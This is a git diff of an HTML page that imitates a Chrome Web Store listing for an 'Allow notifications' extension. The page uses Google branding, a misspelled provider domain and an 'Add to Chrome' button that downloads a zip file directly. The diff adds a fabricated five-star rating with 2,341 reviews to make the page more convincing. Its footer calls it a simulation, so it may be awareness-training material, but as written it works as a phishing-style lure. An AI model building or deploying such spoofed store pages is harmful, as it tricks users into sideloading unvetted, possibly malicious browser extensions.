--- a/index.html
+++ b/index.html
@@ -3,21 +3,92 @@
 <head>
   <meta charset="UTF-8">
   <title>Allow notifications - Chrome Web Store</title>
-  <link rel="stylesheet" href="style.css">
+  <link href="https://fonts.googleapis.com/css2?family=Roboto&display=swap" rel="stylesheet">
+  <style>
+    body {
+      font-family: 'Roboto', sans-serif;
+      background-color: #f9f9f9;
+      margin: 0;
+      padding: 0;
+    }
+    .wrapper {
+      max-width: 980px;
+      margin: auto;
+      background: #fff;
+      padding: 30px 40px;
+      box-shadow: 0 0 10px rgba(0,0,0,0.1);
+    }
+    .header {
+      display: flex;
+      align-items: center;
+      gap: 20px;
+    }
+    .header img {
+      width: 64px;
+    }
+    .title {
+      font-size: 24px;
+      margin: 0;
+    }
+    .provider {
+      color: #666;
+      font-size: 14px;
+      margin-top: 4px;
+    }
+    .rating {
+      margin-top: 8px;
+      color: #ffa500;
+      font-size: 16px;
+    }
+    .install-btn {
+      background-color: #1a73e8;
+      color: white;
+      padding: 12px 24px;
+      border: none;
+      border-radius: 4px;
+      font-size: 15px;
+      cursor: pointer;
+      margin-top: 20px;
+    }
+    .preview-images {
+      display: flex;
+      gap: 20px;
+      flex-wrap: wrap;
+      margin-top: 30px;
+    }
+    .preview-images img {
+      width: 300px;
+      border-radius: 8px;
+      box-shadow: 0 0 10px rgba(0,0,0,0.1);
+    }
+    footer {
+      text-align: center;
+      color: #999;
+      font-size: 12px;
+      margin-top: 50px;
+    }
+  </style>
 </head>
 <body>
-  <div style="max-width: 960px; margin: auto; padding: 40px 20px; font-family: sans-serif; text-align: center;">
-    <img src="icon.png" alt="Icon" style="width: 64px; margin-bottom: 20px;">
-    <h1 style="font-size: 26px;">Allow notifications</h1>
-    <p style="color: #555; font-size: 14px;">Provided by Allownotfications.dev</p>
-    <a href="Allow-notifications.zip" download>
-      <button style="margin-top: 20px; background-color: #1a73e8; color: white; padding: 12px 24px; border: none; border-radius: 6px; cursor: pointer;">Add to Chrome</button>
-    </a>
-    <div style="display: flex; justify-content: center; gap: 20px; flex-wrap: wrap; margin-top: 40px;">
-      <img src="preview1.png" alt="Preview 1" style="width: 300px; border-radius: 10px; box-shadow: 0 0 10px rgba(0,0,0,0.1);">
-      <img src="preview2.png" alt="Preview 2" style="width: 300px; border-radius: 10px; box-shadow: 0 0 10px rgba(0,0,0,0.1);">
+  <div class="wrapper">
+    <div class="header">
+      <img src="icon.png" alt="Extension Icon">
+      <div>
+        <h1 class="title">Allow notifications</h1>
+        <p class="provider">Provided by <strong>Allownotfications.dev</strong></p>
+        <div class="rating">★★★★★ (2,341)</div>
+        <a href="Allow-notifications.zip" download>
+          <button class="install-btn">Add to Chrome</button>
+        </a>
+      </div>
     </div>
-    <p style="margin-top: 60px; font-size: 12px; color: gray;">© 2025 Google LLC - Chrome Web Store (simulation)</p>
+
+    <div class="preview-images">
+      <img src="preview1.png" alt="Preview 1">
+      <img src="preview2.png" alt="Preview 2">
+    </div>
+
+    <footer>© 2025 Google LLC - Chrome Web Store (simulation)</footer>
   </div>
 </body>
 </html>
